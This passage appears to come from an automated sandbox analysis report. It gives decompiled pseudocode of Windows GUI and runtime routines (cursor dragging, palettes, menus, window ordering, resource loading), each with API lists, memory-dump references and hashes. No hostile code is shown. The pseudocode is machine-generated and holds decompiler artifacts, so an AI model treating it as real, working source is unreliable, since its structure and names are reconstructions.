        _t56 = *0x466514; // 0x0
        if(_t166 == *((intOrPtr*)(_t56 + 8))) {
            L12:
            _t57 = *0x466514; // 0x0
            *((intOrPtr*)(_t57 + 0x10)) = *_t122;
            *((intOrPtr*)(_t57 + 0x14)) = *((intOrPtr*)(_t122 + 4));
            _t58 = *0x466514; // 0x0
            if( *((intOrPtr*)(_t58 + 8)) != 0) {
                _t102 = *0x466514; // 0x0
                E0043A55C( *((intOrPtr*)(_t102 + 8)), &_v20, _t122);
                _t105 = *0x466514; // 0x0
                *((intOrPtr*)(_t105 + 0x18)) = _v20;
                *((intOrPtr*)(_t105 + 0x1c)) = _v16;
            }
            _t137 = E004384B8(2);
            _t62 = *0x466514; // 0x0
            _t163 = *((intOrPtr*)( *_t62 + 4))( *((intOrPtr*)(_t122 + 4)));
            if( *0x466534 == 0) {
                L22:
                _t64 = *0x462f14; // 0x466584
                _t67 = SetCursor(E00454B00( *_t64, _t163));
                if( *0x466530 != 2) {
                    goto L34;
                }
                _t188 = _t166;
                if(_t166 != 0) {
                    _t164 = E004384F4();
                    _t69 = *0x466514; // 0x0
                    *((intOrPtr*)(_t69 + 0x60)) = _t164;
                    __eflags = _t164;
                    if(__eflags != 0) {
                        E0043A55C(_t164, &_v24, _t122);
                        _t67 = E00403B24(_t164, __eflags);
                        _t141 = *0x466514; // 0x0
                        *(_t141 + 0x5c) = _t67;
                    } else {
                        _t82 = *0x466514; // 0x0
                        _t67 = E00403B24( *((intOrPtr*)(_t82 + 8)), __eflags);
                        _t147 = *0x466514; // 0x0
                        *(_t147 + 0x5c) = _t67;
                    }
                } else {
                    _push( *((intOrPtr*)(_t122 + 4)));
                    _t84 = *0x466514; // 0x0
                    _t67 = E00403B24( *((intOrPtr*)(_t84 + 0x40)), _t188);
                }
                if( *0x466514 == 0) {
                    goto L34;
                } else {
                    _t123 = *0x466514; // 0x0
                    _t42 = _t123 + 0x64; // 0x64
                    _t43 = _t123 + 0x4c; // 0x4c
                    _t67 = E00408670(_t43, 0x10, _t42);
                    if(_t67 != 0) {
                        goto L34;
                    }
                    if(_v28 != 0) {
                        _t77 = *0x466514; // 0x0
                        if( *((intOrPtr*)( *_t77 + 0x3c))() != 0) {
                            _t79 = *0x466514; // 0x0
                            *((intOrPtr*)( *_t79 + 0x34))();
                        }
                    }
                    _t74 = *0x466514; // 0x0
                    *((intOrPtr*)( *_t74 + 0x30))();
                    _t76 = *0x466514; // 0x0
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    asm("movsd");
                    return _t76;
                }
            } else {
                if(_t166 == 0 || ( *(_t166 + 0x51) & 0x00000020) != 0) {
                    L18:
                    _t86 = *0x466534; // 0x0
                    L00443F50(_t86, _t163);
                    _t88 = *0x466534; // 0x0
                    _t186 = *((char*)(_t88 + 0x6a));
                    if( *((char*)(_t88 + 0x6a)) != 0) {
                        _t89 = *0x466534; // 0x0
                        E00444070(_t89, *((intOrPtr*)(_t122 + 4)), *_t122, __eflags);
                    } else {
                        _t92 = GetDesktopWindow();
                        _t93 = *0x466534; // 0x0
                        L00443F74(_t93, _t92, _t186, *((intOrPtr*)(_t122 + 4)));
                    }
                    goto L22;
                } else {
                    _t95 = *0x466514; // 0x0
                    if( *((char*)(_t95 + 4)) == 0) {
                        _t96 = *0x466534; // 0x0
                        E004440E4(_t96, _t137, __eflags);
                        _t98 = *0x462f14; // 0x466584
                        SetCursor(E00454B00( *_t98, _t163));
                        goto L22;
                    }
                    goto L18;
                }
            }
        } else {
            _t67 = E004384B8(1);
            if( *0x466514 == 0) {
                L34:
                return _t67;
            }
            _t107 = *0x466514; // 0x0
            *((intOrPtr*)(_t107 + 8)) = _t166;
            _t108 = *0x466514; // 0x0
            *((intOrPtr*)(_t108 + 0xc)) = _v28;
            _t109 = *0x466514; // 0x0
            *((intOrPtr*)(_t109 + 0x10)) = *_t122;
            *((intOrPtr*)(_t109 + 0x14)) = *((intOrPtr*)(_t122 + 4));
            _t67 = E004384B8(0);
            if( *0x466514 == 0) {
                goto L34;
            }
            goto L12;
        }
    }
    _t115 = *0x466520; // 0x0
    asm("cdq");
    _t173 = (_t115 - *__eax ^ __edx) - __edx - *0x46652c; // 0x0
    if(_t173 >= 0) {
        goto L3;
    }
    _t119 = *0x466524; // 0x0
    asm("cdq");
    _t67 = (_t119 - *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
    _t174 = _t67 - *0x46652c; // 0x0
    if(_t174 < 0) {
        goto L34;
    }
    goto L3;
}

                                                                            0x00438672
                                                                            0x00438675
                                                                            0x0043867d
                                                                            0x00438680
                                                                            0x00438687
                                                                            0x0043868d
                                                                            0x00438692
                                                                            0x0043869e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0043869e
                                                                            0x00438657
                                                                            0x004385a5
                                                                            0x004385ac
                                                                            0x004385b1
                                                                            0x004385b7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004385b9
                                                                            0x004385c1
                                                                            0x004385c4
                                                                            0x004385c6
                                                                            0x004385cc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000

                                                                            APIs
                                                                            • GetDesktopWindow.USER32 ref: 00438609
                                                                            • GetDesktopWindow.USER32 ref: 00438739
                                                                            • SetCursor.USER32(00000000), ref: 0043878E
                                                                              • Part of subcall function 004440E4: ImageList_EndDrag.COMCTL32(?,-00000010,00438769), ref: 00444100
                                                                            • SetCursor.USER32(00000000), ref: 00438779
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CursorDesktopWindow$DragImageList_
                                                                            • String ID:
                                                                            • API String ID: 617806055-0
                                                                            • Opcode ID: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a
                                                                            • Instruction ID: 08362208b1a53e947958c9dd7a602420f7f888ca1ef680945a718b5847218c5a
                                                                            • Opcode Fuzzy Hash: 3bcd75b5abe411c5b0deca700f6720d75792e6beb4e63713e0ee92e8f9771c6a
                                                                            • Instruction Fuzzy Hash: C7915274600240EFC704DF29E986A15B7E1BB48308F15916AF4458B37AEBB8ED45CF6B
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 82%
E0040F840(signed short* __eax) {
    char _v260;
    char _v768;
    char _v772;
    signed short* _v776;
    signed short* _v780;
    char _v784;
    signed int _v788;
    char _v792;
    intOrPtr* _v796;
    signed char _t43;
    intOrPtr* _t60;
    void* _t79;
    void* _t81;
    void* _t84;
    void* _t85;
    intOrPtr* _t92;
    void* _t96;
    char* _t97;
    void* _t98;

    _v776 = __eax;
    if((_v776[0] & 0x00000020) == 0) {
        E0040F688(0x80070057);
    }
    _t43 = *_v776 & 0x0000ffff;
    if((_t43 & 0x00000fff) == 0xc) {
        if((_t43 & 0x00000040) == 0) {
            _v780 = _v776[4];
        } else {
            _v780 = *(_v776[4]);
        }
        _v788 = *_v780 & 0x0000ffff;
        _t79 = _v788 - 1;
        if(_t79 >= 0) {
            _t85 = _t79 + 1;
            _t96 = 0;
            _t97 = &_v772;
            do {
                _v796 = _t97;
                _push(_v796 + 4);
                _t22 = _t96 + 1; // 0x1
                _push(_v780);
                L0040E714();
                E0040F688(_v780);
                _push( &_v784);
                _t25 = _t96 + 1; // 0x1
                _push(_v780);
                L0040E71C();
                E0040F688(_v780);
                *_v796 = _v784 - *((intOrPtr*)(_v796 + 4)) + 1;
                _t96 = _t96 + 1;
                _t97 = _t97 + 8;
                _t85 = _t85 - 1;
            } while (_t85 != 0);
        }
        _t81 = _v788 - 1;
        if(_t81 >= 0) {
            _t84 = _t81 + 1;
            _t60 = &_v768;
            _t92 = &_v260;
            do {
                *_t92 = *_t60;
                _t92 = _t92 + 4;
                _t60 = _t60 + 8;
                _t84 = _t84 - 1;
            } while (_t84 != 0);
            do {
                goto L12;
            } while (E0040F7E4(_t83, _t98) != 0);
            goto L15;
        }
        L12:
        _t83 = _v788 - 1;
        if(E0040F7B4(_v788 - 1, _t98) != 0) {
            _push( &_v792);
            _push( &_v260);
            _push(_v780);
            L0040E744();
            E0040F688(_v780);
            E0040FA38(_v792);
        }
    }
    L15:
    _push(_v776);
    L0040E2A4();
    return E0040F688(_v776);
}

                                                                            APIs
                                                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040F8EF
                                                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040F90B
                                                                            • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040F982
                                                                            • VariantClear.OLEAUT32(?), ref: 0040F9AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                            • String ID:
                                                                            • API String ID: 920484758-0
                                                                            • Opcode ID: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3
                                                                            • Instruction ID: 8ec9ce3e26e7a4601e4635a5e9cb7351c893333f832fa8fc9e86651aa83f5178
                                                                            • Opcode Fuzzy Hash: d17882f798cf53baf8a39fefcb7af180c9a2307b2ce2c27e917eb7973a9318f3
                                                                            • Instruction Fuzzy Hash: 19413F75A012199FCB61EB59CC90BC9B3BCAF48304F4045FAE548F7652DA38AF858F54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
E004283D0(intOrPtr __eax, void* __edx) {
    intOrPtr _v8;
    void* __ebx;
    void* __ecx;
    void* __esi;
    void* __ebp;
    intOrPtr _t33;
    intOrPtr _t59;
    struct HDC__* _t69;
    void* _t70;
    intOrPtr _t79;
    void* _t84;
    struct HPALETTE__* _t85;
    intOrPtr _t87;
    intOrPtr _t89;

    _t87 = _t89;
    _push(_t70);
    _v8 = __eax;
    _t33 = _v8;
    if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
        return _t33;
    } else {
        E004265A0(_v8);
        _push(_t87);
        _push(0x4284af);
        _push( *[fs:eax]);
        *[fs:eax] = _t89;
        E004296F8( *((intOrPtr*)(_v8 + 0x58)));
        E0042824C( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
        E004297F8( *((intOrPtr*)(_v8 + 0x58)));
        _t69 = CreateCompatibleDC(0);
        _t84 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
        if(_t84 == 0) {
            *((intOrPtr*)(_v8 + 0x5c)) = 0;
        } else {
            *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t69, _t84);
        }
        _t85 = *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 0x10);
        if(_t85 == 0) {
            *((intOrPtr*)(_v8 + 0x60)) = 0;
        } else {
            *((intOrPtr*)(_v8 + 0x60)) = SelectPalette(_t69, _t85, 0xffffffff);
            RealizePalette(_t69);
        }
        E004268A4(_v8, _t69);
        _t59 = *0x461eec; // 0x2711c68
        E0041AAF4(_t59, _t69, _t70, _v8, _t85);
        _pop(_t79);
        *[fs:eax] = _t79;
        _push(0x4284b6);
        return E00426710(_v8);
    }
}

                                                                            APIs
                                                                              • Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00466380,00000000,00424F52,00000000,00424FB1), ref: 004265A8
                                                                              • Part of subcall function 004265A0: LeaveCriticalSection.KERNEL32(00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265B5
                                                                              • Part of subcall function 004265A0: EnterCriticalSection.KERNEL32(00000038,00466380,00466380,00000000,00424F52,00000000,00424FB1), ref: 004265BE
                                                                              • Part of subcall function 004297F8: GetDC.USER32(00000000), ref: 0042984E
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00429863
                                                                              • Part of subcall function 004297F8: GetDeviceCaps.GDI32(00000000,0000000E), ref: 0042986D
                                                                              • Part of subcall function 004297F8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00428423,00000000,004284AF), ref: 00429891
                                                                              • Part of subcall function 004297F8: ReleaseDC.USER32 ref: 0042989C
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00428425
                                                                            • SelectObject.GDI32(00000000,?), ref: 0042843E
                                                                            • SelectPalette.GDI32(00000000,?,000000FF), ref: 00428467
                                                                            • RealizePalette.GDI32(00000000), ref: 00428473
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalPaletteSection$CapsCreateDeviceEnterSelect$CompatibleHalftoneLeaveObjectRealizeRelease
                                                                            • String ID:
                                                                            • API String ID: 979337279-0
                                                                            • Opcode ID: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a
                                                                            • Instruction ID: e87ff1c804d76903f950264df5696ada03ea7b14f1511ea4f0a767a0c079a61f
                                                                            • Opcode Fuzzy Hash: 93bebc2edd455ddf18fa106c5646cc94971223008aa3a34a3a8727028a1c549a
                                                                            • Instruction Fuzzy Hash: AA310934B01664EFD704EB59D981D4DB7F5EF48314B6241AAF804AB362DA38EE40DB54
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00434010(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
    intOrPtr _v8;
    void* __ecx;
    void* __edi;
    int _t27;
    void* _t40;
    int _t41;
    int _t50;

    _t50 = _t41;
    _t49 = __edx;
    _t40 = __eax;
    if(E004334A8(__eax) == 0) {
        return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
    }
    _v8 = 0;
    if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
        _t27 = GetMenuItemID(_t49, _t50);
        _t51 = _t27;
        if(_t27 != 0xffffffff) {
            _v8 = E00433324(_t40, 0, _t51);
        }
    } else {
        _t49 = GetSubMenu(_t49, _t50);
        _v8 = E00433324(_t40, 1, _t37);
    }
    if(_v8 == 0) {
        return 0;
    } else {
        *_a12 = 0;
        E004090D8(_a12, _a8, *((intOrPtr*)(_v8 + 0x30)));
        return E00409008(_a12, _t49);
    }
}

                                                                            APIs
                                                                            • GetMenuState.USER32 ref: 00434033
                                                                            • GetSubMenu.USER32 ref: 0043403E
                                                                            • GetMenuItemID.USER32(?,?), ref: 00434057
                                                                            • GetMenuStringA.USER32(?,?,?,?,?), ref: 004340AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: Menu$ItemStateString
                                                                            • String ID:
                                                                            • API String ID: 306270399-0
                                                                            • Opcode ID: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91
                                                                            • Instruction ID: 11efe109d52895c86013a67b98394270421268660deb29a3708cc45bd7cb4ea2
                                                                            • Opcode Fuzzy Hash: c83668f70c58b27ff1ae3854190cf90560c38d16cda432900dd57c84b320ed91
                                                                            • Instruction Fuzzy Hash: 0511AF31701214AFC714EE69CC809EF7BE8AF89364F10542AF909D7382CA38AD019768
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
E00429958(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
    intOrPtr _v8;
    intOrPtr _v12;
    intOrPtr _t62;
    intOrPtr _t64;
    intOrPtr _t67;
    void* _t77;
    void* _t78;
    intOrPtr _t79;
    intOrPtr _t80;

    _t77 = _t78;
    _t79 = _t78 + 0xfffffff8;
    _v8 = __eax;
    _v12 = E004038F8(1);
    _push(_t77);
    _push(0x4299e0);
    _push( *[fs:eax]);
    *[fs:eax] = _t79;
    *((intOrPtr*)(_v12 + 8)) = __edx;
    *((intOrPtr*)(_v12 + 0x10)) = __ecx;
    memcpy(_v12 + 0x18, _a12, 0x15 << 2);
    _t80 = _t79 + 0xc;
    _t12 = &_a8; // 0x466368
    *((char*)(_v12 + 0x70)) = *_t12 & 0x000000ff;
    if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
        *((intOrPtr*)(_v12 + 0x14)) = *((intOrPtr*)(_v12 + 8));
    }
    _t62 = *0x418b88; // 0x418bd4
    *((intOrPtr*)(_v12 + 0x6c)) = E00403AD8(_a4, _t62);
    _pop(_t64);
    *[fs:eax] = _t64;
    EnterCriticalSection(0x466368);
    _push(_t77);
    _push(0x429a40);
    _push( *[fs:edx]);
    *[fs:edx] = _t80;
    E004284C0( *((intOrPtr*)(_v8 + 0x28)));
    *((intOrPtr*)(_v8 + 0x28)) = _v12;
    E004284BC(_v12);
    _pop(_t67);
    *[fs:eax] = _t67;
    _push(0x429a47);
    LeaveCriticalSection(0x466368);
    return 0;
}


                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(00466368), ref: 004299FC
                                                                            • LeaveCriticalSection.KERNEL32(00466368,00429A47,00466368), ref: 00429A3A
                                                                            Strings
                                                                            • XHB , xrefs: 0042996A
                                                                            • hcF , xrefs: 004299A6
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeave
                                                                            • String ID: XHB$hcF
                                                                            • API String ID: 3168844106-4103439798
                                                                            • Opcode ID: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011
                                                                            • Instruction ID: b30c6dabbdf70119b55d85a08352cb78ceca07d7645c1d65d08a879069df6dfc
                                                                            • Opcode Fuzzy Hash: ff56ce312c069636ff70dcece962d5d7b289df0c569e2d8a3dddfc511be1f011
                                                                            • Instruction Fuzzy Hash: 75219C74B04308AFC701DF69D88198DBBF5FB89320F6181AAF840A7351D778AE80CB58
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00455BB4(void* __eax, void* __ecx, char __edx) {
    char _v12;
    struct HWND__* _v20;
    int _t17;
    void* _t27;
    struct HWND__* _t33;
    void* _t35;
    void* _t36;
    long _t37;

    _t37 = _t36 + 0xfffffff8;
    _t27 = __eax;
    _t17 = *0x466580; // 0x26df470
    if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
        if( *((intOrPtr*)(__eax + 0x94)) == 0) {
            *_t37 = *((intOrPtr*)(__eax + 0x30));
            _v12 = __edx;
            EnumWindows(E00455B44, _t37);
            _t5 = _t27 + 0x90; // 0x0
            _t17 = *_t5;
            if( *((intOrPtr*)(_t17 + 8)) != 0) {
                _t33 = GetWindow(_v20, 3);
                _v20 = _t33;
                if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                    _v20 = 0xfffffffe;
                }
                _t10 = _t27 + 0x90; // 0x0
                _t17 = *_t10;
                _t35 = *((intOrPtr*)(_t17 + 8)) - 1;
                if(_t35 >= 0) {
                    do {
                        _t13 = _t27 + 0x90; // 0x0
                        _t17 = SetWindowPos(E0041A80C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                        _t35 = _t35 - 1;
                    } while (_t35 != 0xffffffff);
                }
            }
        }
        *((intOrPtr*)(_t27 + 0x94)) = *((intOrPtr*)(_t27 + 0x94)) + 1;
    }
    return _t17;
}


                                                                            APIs
                                                                            • EnumWindows.USER32(00455B44), ref: 00455BE9
                                                                            • GetWindow.USER32(00000003,00000003), ref: 00455C01
                                                                            • GetWindowLongA.USER32 ref: 00455C0E
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455C4D
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$EnumLongWindows
                                                                            • String ID:
                                                                            • API String ID: 4191631535-0
                                                                            • Opcode ID: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a
                                                                            • Instruction ID: b5efe040d9ee5e4ec0beb5a4be758dd33e8dc33b5e347aa2bed5e18668bfd801
                                                                            • Opcode Fuzzy Hash: f23556552e1aea1059882e65ad043ba57e80b2ff24d4e9f5c909e951feda954a
                                                                            • Instruction Fuzzy Hash: F2119E306047509FDB21EB28CC85FA673D4AB05325F1402BAFE58AB2D3C3789C84C76A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E0043A4D8(void* __eax, int __ecx, int __edx) {
    void* _t6;
    intOrPtr _t16;
    int _t27;
    int _t28;
    int _t29;
    int _t30;
    int _t31;
    int _t32;

    _t6 = __eax;
    _t27 = __ecx;
    _t28 = __edx;
    _t16 = *((intOrPtr*)(__eax + 0x74));
    _t29 = *(_t16 + 0x14);
    if(_t29 > 0) {
        _t6 = E00439390(_t16, MulDiv(_t29, __edx, __ecx), 3);
    }
    _t30 = *(_t16 + 0xc);
    if(_t30 > 0) {
        _t6 = E00439390(_t16, MulDiv(_t30, _t28, _t27), 1);
    }
    _t31 = *(_t16 + 0x10);
    if(_t31 > 0) {
        _t6 = E00439390(_t16, MulDiv(_t31, _t28, _t27), 2);
    }
    _t32 = *(_t16 + 8);
    if(_t32 > 0) {
        return E00439390(_t16, MulDiv(_t32, _t28, _t27), 0);
    }
    return _t6;
}


                                                                            APIs
                                                                            • MulDiv.KERNEL32(?), ref: 0043A4ED
                                                                            • MulDiv.KERNEL32(?), ref: 0043A50A
                                                                            • MulDiv.KERNEL32(?), ref: 0043A527
                                                                            • MulDiv.KERNEL32(?), ref: 0043A544
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce
                                                                            • Instruction ID: f4bc81ab66daf8a9df15c71cec539322716d65d0bf1aec78caf828b6dab18041
                                                                            • Opcode Fuzzy Hash: 343edcee43f4d4a2bc000d28523ac80406228f184dd9ae9d624a554c2fb86fce
                                                                            • Instruction Fuzzy Hash: 6A0116613002182BC724BD2B5C45F5B3AADDBC9754F01507E791A9B383EAA9ED2082A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
E0041D024(void* __eax, struct HINSTANCE__* __edx, CHAR* _a8) {
    CHAR* _v8;
    void* __ebx;
    void* __ecx;
    void* __edi;
    void* __esi;
    void* __ebp;
    void* _t18;
    void* _t23;
    CHAR* _t24;
    void* _t25;
    struct HRSRC__* _t29;
    void* _t30;
    struct HINSTANCE__* _t31;
    void* _t32;

    _v8 = _t24;
    _t31 = __edx;
    _t23 = __eax;
    _t29 = FindResourceA(__edx, _v8, _a8);
    *(_t23 + 0x10) = _t29;
    if(_t29 == 0) {
        E0041CF84(_t23, _t24, _t29, _t31, _t32);
        _pop(_t24);
    }
    _t5 = _t23 + 0x10; // 0x41d0c0
    _t30 = LoadResource(_t31, *_t5);
    *(_t23 + 0x14) = _t30;
    if(_t30 == 0) {
        E0041CF84(_t23, _t24, _t30, _t31, _t32);
    }
    _t7 = _t23 + 0x10; // 0x41d0c0
    _push(SizeofResource(_t31, *_t7));
    _t8 = _t23 + 0x14; // 0x41cd68
    _t18 = LockResource( *_t8);
    _pop(_t25);
    return E0041CD28(_t23, _t25, _t18);
}


                                                                            APIs
                                                                            • FindResourceA.KERNEL32(?,?,?), ref: 0041D03B
                                                                            • LoadResource.KERNEL32(?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D055
                                                                            • SizeofResource.KERNEL32(?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000,?), ref: 0041D06F
                                                                            • LockResource.KERNEL32(0041CD68,00000000,?,0041D0C0,?,0041D0C0,?,?,?,00418C50,?,00000001,00000000,?,0041CF66,00000000), ref: 0041D079
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                            • String ID:
                                                                            • API String ID: 3473537107-0
                                                                            • Opcode ID: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59
                                                                            • Instruction ID: 11fe1cfdb4414f926eae3f9df9586ded9b707078bdbb83b49df9978c7684b3c8
                                                                            • Opcode Fuzzy Hash: 5d89a7fb75850f26319e684402d0780e3acc06d2bdee2c569710ca98c6396b59
                                                                            • Instruction Fuzzy Hash: D0F0ADB36042146F8744EF6EAC81D9B7BECEE88364310012FF908D7242DA38ED118778
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 87%
E004383DC(struct HWND__* __eax, void* __ecx) {
    intOrPtr _t9;
    signed int _t16;
    struct HWND__* _t19;
    DWORD* _t20;

    _t17 = __ecx;
    _push(__ecx);
    _t19 = __eax;
    _t16 = 0;
    if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() == *_t20) {
        _t9 = *0x466504; // 0x270a898
        if(GlobalFindAtomA(E00404C00(_t9)) != *0x466500) {
            _t16 = 0 | E00437448(_t19, _t17) != 0x00000000;
        } else {
            _t16 = 0 | GetPropA(_t19, *0x466500 & 0x0000ffff) != 0x00000000;
        }
    }
    return _t16;
}


                                                                            APIs
                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 004383E9
                                                                            • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00438454,-000000F7,?,00000000,0043800E,?,-00000010,?), ref: 004383F2
                                                                            • GlobalFindAtomA.KERNEL32(00000000), ref: 00438407
                                                                            • GetPropA.USER32 ref: 0043841E
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                                                            • String ID:
                                                                            • API String ID: 2582817389-0
                                                                            • Opcode ID: c8253abe16581fcb99d44ece300b1cfe7add3b6cfb4c013908db5c544134e519
